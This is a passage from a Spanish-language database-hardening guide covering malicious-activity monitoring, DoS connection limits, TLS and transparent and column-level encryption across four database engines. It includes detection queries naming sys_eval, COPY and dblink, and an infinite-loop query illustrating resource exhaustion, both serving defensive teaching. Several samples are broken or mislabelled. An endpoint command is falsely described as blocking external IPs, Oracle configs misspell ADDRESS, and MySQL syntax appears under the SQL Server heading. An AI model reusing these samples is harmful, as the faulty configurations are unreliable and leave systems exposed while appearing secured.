ADD TARGET package0.event_file (SET filename = 'C:\Audit\MalwareDetection.xel');
ALTER EVENT SESSION MalwareDetection ON SERVER STATE = START;
```

En Oracle se puede configurar auditoría para detectar intentos de ejecutar procedimientos peligrosos: *AUDIT EXECUTE ON DBMS_JOB*;

También se pueden integrar otras herramientas como *Microsoft Defender for SQL* que identifica actividades sospechosas y ataques. En Oracle, se puede integrar *Oracle Audit Vault* para monitorear actividades anómalas.

En MySQL se puede monitorear intentos de ejecución de comandos peligrosos:

```
SELECT * FROM mysql.general_log WHERE argument LIKE '%SELECT sys_eval%';
```

En PostgreSQL se puede monitorear la ejecución de funciones sospechosas:

```
SELECT * FROM pg_stat_activity WHERE query LIKE '%COPY%' OR query LIKE '%dblink%';
```

Además de todas estas configuraciones, también se puede optar por limitar la capacidad de la base de datos para interactuar con recursos externos lo que puede reducir las vías de ataque.

En SQL Server se puede bloquear acceso a direcciones IP externas desde la base de datos de la siguiente manera:

```
CREATE ENDPOINT BlockExternalAccess
STATE = STOPPED
FOR TSQL() WITH (AUTHENTICATION = NONE);
```

En Oracle se puede configurar ACL (*Access Control Lists*) para restringir acceso a redes externas:

```
BEGIN
  DBMS_NETWORK_ACL_ADMIN.CREATE_ACL(
    acl      => 'block_external_access.xml',
    description => 'Restringir acceso externo',
    principal => 'PUBLIC',
    is_grant  => FALSE,
    privilege => 'connect'
  );
END;
/
```

Denegación de Servicio (DoS)

Los ataques DoS buscan saturar los recursos de la base de datos para que no pueda responder a usuarios legítimos.

Sin limitar el número de conexiones, un atacante puede saturar los recursos del servidor. En el siguiente ejemplo, el servidor queda inoperativo para usuarios legítimos debido al consumo excesivo de recursos al realizarse conexiones ilimitadas:

```
WHILE (1=1)
BEGIN
EXEC sp_executesql N'SELECT * FROM Users';
END;
```

En SQL Server se puede limitar las conexiones concurrentes de la siguiente manera:

```
EXEC sp_configure 'user connections', 100;
RECONFIGURE;
```

De esta manera, se limita a solo 100 conexiones.

En Oracle se hace mediante:

```
ALTER SYSTEM SET SESSIONS = 100;
```

Como medidas complementarias se puede configurar *firewalls* para bloquear direcciones IP sospechosas y distribuir conexiones entre varios servidores con tecnologías como *SQL Server Always On* u *Oracle RAC*.

En MySQL se puede:

Limitar el número de conexiones concurrentes:

```
SET GLOBAL max_connections = 100;
```

Restringir conexiones por usuario:

```
ALTER USER 'usuario'@'%' WITH MAX_CONNECTIONS_PER_HOUR 50;
```

Bloquear direcciones IP sospechosas en el *firewall*:

```
sudo iptables -A INPUT -s 192.168.1.100 -j DROP
```

En PostgreSQL:

Limitar el número de conexiones por usuario:

```
ALTER ROLE usuario CONNECTION LIMIT 10;
```

Configurar un límite global de conexiones:

```
ALTER SYSTEM SET max_connections = 100;
```

Configurar el firewall para bloquear direcciones IP sospechosas:

```
sudo ufw deny from 192.168.1.100 to any port 5432
```

Cifrados y encriptación en bases de datos

El cifrado es una técnica esencial para proteger la confidencialidad de los datos, convirtiéndolos en un formato ilegible para usuarios o sistemas no autorizados. Esto asegura que, incluso si los datos son interceptados o comprometidos, no puedan ser interpretados sin la clave correspondiente.

Cifrado en Tránsito

Protege los datos mientras se transfieren entre clientes y servidores, evitando que sean interceptados por atacantes en la red. Los protocolos usados son:

- TLS (*Transport Layer Security*): Reemplaza SSL y ofrece mayor seguridad.
- IPsec: Asegura comunicaciones a nivel de red.

En SQL Server se puede habilitar el cifrado al configurar el servidor para forzar el cifrado en las conexiones. En el siguiente ejemplo, el 1 representa que se va a forzar el cifrado:

```
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'force encryption', 1;
RECONFIGURE;
```

En el archivo de configuración del cliente o en las herramientas de conexión (como SSMS), se debe habilitar la opción de cifrado. Por ejemplo, en la cadena de conexión:

```
Server=myServerAddress;Database=myDataBase;User Id=myUsername;
Password=myPassword;Encrypt=True;TrustServerCertificate=False;
```

Para asegurar de que la conexión está cifrada, se puede revisar la vista dinámica `sys.dm_exec_connections`. Si `encrypt_option` es `TRUE`, la conexión está cifrada:

```
SELECT session_id, encrypt_option
FROM sys.dm_exec_connections;
```

En Oracle, la configuración de TLS/SSL se puede realizar por medio de *Oracle Wallet*. El *wallet* almacena certificados para establecer conexiones seguras.

Configurar Oracle Wallet:

```
mkdir -p /u01/app/oracle/admin/wallet
orapki wallet create -wallet /u01/app/oracle/admin/wallet -auto_login
```

Importar certificados al Wallet:

```
orapki wallet add -wallet /u01/app/oracle/admin/wallet -trusted_cert -cert
/path/to/ca_cert.pem
```

Configurar el Listener para SSL:

```
SSL_LISTENER =
(DESCRIPTION_LIST =
(DESCRIPTION =
(AADDRESS = (PROTOCOL = TCPS)(HOST = myserver)(PORT = 2484))
)
)
```

Configurar el servidor SQL*Net:

```
WALLET_LOCATION =
(SOURCE =
(METHOD = FILE)
(METHOD_DATA =
(DIRECTORY = /u01/app/oracle/admin/wallet)
)
)
```

```
SQLNET.AUTHENTICATION_SERVICES = (BEQ, TCPS)
SSL_VERSION = 1.2
```

Configurar el Cliente para SSL:

```
MYDB_SSL =
(DESCRIPTION =
(AADDRESS = (PROTOCOL = TCPS)(HOST = myserver)(PORT = 2484))
(CONNECT_DATA =
(SERVICE_NAME = mydb)
)
)
```

Para poder realizar la verificación, se puede hacer mediante la siguiente consulta:

```
SELECT NETWORK_SERVICE_BANNER
FROM V$SESSION_CONNECT_INFO
WHERE SID = (SELECT SID FROM V$SESSION WHERE AUDSID =
USERENV('SESSIONID'));
```

En MySQL se puede:

Habilitar TLS para conexiones seguras:

```
[mysqld]
require_secure_transport = ON
```

Verificar conexiones cifradas:

```
SHOW STATUS LIKE 'Ssl_cipher';
```

EN PostgreSQL:

Habilitar SSL en *postgresql.conf*:

```
ssl = on
```

Configurar la autenticación en *pg_hba.conf*:

```
hostssl all all 0.0.0.0/0 md5
```

Verificar conexiones cifradas:

```
SHOW ssl;
```

Cifrado en Reposo

Protege los datos almacenados en discos, respaldos y otros medios. Evita el acceso no autorizado a datos en caso de robo físico o compromiso del almacenamiento. Métodos

Usados:

- TDE (*Transparent Data Encryption*): Encripta automáticamente los datos almacenados en discos.
- Cifrado a nivel de columna: Encripta solo columnas específicas que contienen datos sensibles.

El *Transparent Data Encryption* se puede configurar en SQL Server, Oracle, MySQL y PostgreSQL. En SQL Server es de la siguiente manera:

Crear una clave maestra:

```
CREATE MASTER KEY ENCRYPTION BY PASSWORD = 'ClaveMaestraSegura123!';
```

Crear un certificado para TDE:

```
CREATE CERTIFICATE CertificadoTDE  
WITH SUBJECT = 'Certificado para TDE';
```

Crear la clave de encriptación para la base de datos:

```
USE MiBaseDatos;  
CREATE DATABASE ENCRYPTION KEY  
WITH ALGORITHM = AES_256  
ENCRYPTION BY SERVER CERTIFICATE CertificadoTDE;
```

Habilitar TDE en la base de datos:

```
ALTER DATABASE MiBaseDatos SET ENCRYPTION ON;
```

Verificar el estado del cifrado:

```
SELECT name, is_encrypted  
FROM sys.databases;
```

La configuración en Oracle se realiza de la siguiente manera:

Configurar el entorno de claves:

```
ADMINISTER KEY MANAGEMENT SET KEYSTORE OPEN IDENTIFIED BY  
"ClaveSegura";
```

Crear una clave maestra:

```
ADMINISTER KEY MANAGEMENT SET KEY IDENTIFIED BY "ClaveSegura" WITH  
BACKUP;
```

La configuración en Oracle también se puede realizar a través de *RMAN Encryption*. RMAN cifra los respaldos automáticamente usando claves configuradas en el *keystore* o *wallet* de Oracle. Utiliza algoritmos robustos como AES (*Advanced Encryption Standard*).

Configurar la ubicación del *keystore*:

```
ALTER SYSTEM SET ENCRYPTION_WALLET_LOCATION =  
'(SOURCE=(METHOD=FILE)(METHOD_DATA=(DIRECTORY=/u01/wallet)))';
```

Crear y abrir el *keystore*:

```
ADMINISTER KEY MANAGEMENT CREATE KEYSTORE '/u01/wallet' IDENTIFIED BY
"ClaveSegura";
ADMINISTER KEY MANAGEMENT SET KEYSTORE OPEN IDENTIFIED BY
"ClaveSegura";
```

Configurar la clave maestra:

```
ADMINISTER KEY MANAGEMENT SET KEY IDENTIFIED BY "ClaveSegura" WITH
BACKUP;
```

Configuración de cifrado en RMAN:

```
RMAN> CONFIGURE ENCRYPTION FOR DATABASE ON;
RMAN> CONFIGURE ENCRYPTION ALGORITHM 'AES256';
```

Crear un respaldo cifrado:

```
RMAN> BACKUP DATABASE;
```

Cifrado con Contraseña:

```
RMAN> BACKUP AS COMPRESSED BACKUPSET DATABASE ENCRYPTION
USING 'ClaveDeRespaldo';
```

Restaurar el respaldo cifrado:

```
RMAN> RESTORE DATABASE FROM BACKUPSET ENCRYPTION USING
'ClaveDeRespaldo';
```

Verificación del Estado del Respaldo:

```
RMAN> LIST BACKUP BY FILE;
```

El cifrado a nivel de columna es un tipo de cifrado selectivo que protege únicamente columnas específicas dentro de una tabla en una base de datos. Este enfoque se utiliza principalmente cuando solo algunos datos son sensibles y necesitan protección, como números de tarjetas de crédito, identificaciones personales o credenciales de usuarios.

En SQL Server se puede configurar con las siguientes instrucciones:

Crear una clave simétrica:

```
CREATE SYMMETRIC KEY MiClaveSimetrica
WITH ALGORITHM = AES_256
ENCRYPTION BY PASSWORD = 'ClaveSegura!2024';
```



```
ALTER TABLE Clientes ENCRYPTION='Y';
```

Cifrar columnas específicas:

```
INSERT INTO Clientes (nombre, tarjeta_credito)
VALUES ('Juan', AES_ENCRYPT('4111111111111111', 'ClaveSegura'));
```

En PostgreSQL se puede:

Usar la extensión *pgcrypto* para cifrado de datos:

```
CREATE EXTENSION pgcrypto;
```

Cifrar y descifrar datos sensibles:

```
INSERT INTO Clientes (nombre, tarjeta_credito)
VALUES ('Juan', PGP_SYM_ENCRYPT('4111111111111111', 'ClaveSegura'));

SELECT nombre, PGP_SYM_DECRYPT(tarjeta_credito::bytea, 'ClaveSegura') FROM
Clientes;
```